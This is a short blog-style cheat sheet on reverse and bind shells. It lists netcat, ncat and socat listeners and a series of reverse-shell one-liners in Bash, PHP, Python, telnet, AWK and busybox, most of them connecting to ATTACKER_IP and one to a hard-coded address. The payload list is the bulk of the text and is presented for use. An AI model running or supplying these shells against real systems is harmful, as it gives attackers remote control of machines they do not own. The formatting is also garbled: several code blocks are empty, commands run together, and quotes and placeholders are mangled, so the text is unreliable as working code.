Shells Overview
May 18, 2025Reverse Shell
First we need to start a listener to the reverse shell
| |
Now how can we write a reverse shell
| |
Bind Shell
| |
then we need to connect to this binding shell by netcat
| |
Shell listeners
How can we enhance our shell experience
rlwrap nc -lvnp 443ncatwe can ssl by--sslsocat -d -d TCP-LISTEN:443 STDOUT
Shell payloads
Bash
bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1exec 5<>/dev/tcp/ATTACKER_IP/443; cat <&5 | while read line; do $line 2>&5 >&5; done0<&196;exec 196<>/dev/tcp/ATTACKER_IP/443; sh <&196 >&196 2>&196bash -i 5<> /dev/tcp/ATTACKER_IP/443 0<&5 1>&5 2>&5
PHP
php -r '$sock=fsockopen("ATTACKER_IP",443);exec("sh <&3 >&3 2>&3");'php -r '$sock=fsockopen("ATTACKER_IP",443);shell_exec("sh <&3 >&3 2>&3");'php -r '$sock=fsockopen("ATTACKER_IP",443);system("sh <&3 >&3 2>&3");'php -r '$sock=fsockopen("ATTACKER_IP",443);passthru("sh <&3 >&3 2>&3");'php -r '$sock=fsockopen("ATTACKER_IP",443);popen("sh <&3 >&3 2>&3", "r");'
Python
export RHOST="ATTACKER_IP"; export RPORT=443; PY-C 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'- `PY-C ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.4.99.209”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“bash”)’
- `PY-C ‘import os,pty,socket;s=socket.socket();s.connect((“ATTACKER_IP”,443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(“bash”)’
telnet
TF=$(mktemp -u); mkfifo $TF && telnet ATTACKER_IP443 0<$TF | sh 1>$TF
AWK
awk 'BEGIN {s = "/inet/tcp/0/ATTACKER_IP/443"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
busy box
busybox nc ATTACKER_IP 443 -e sh
`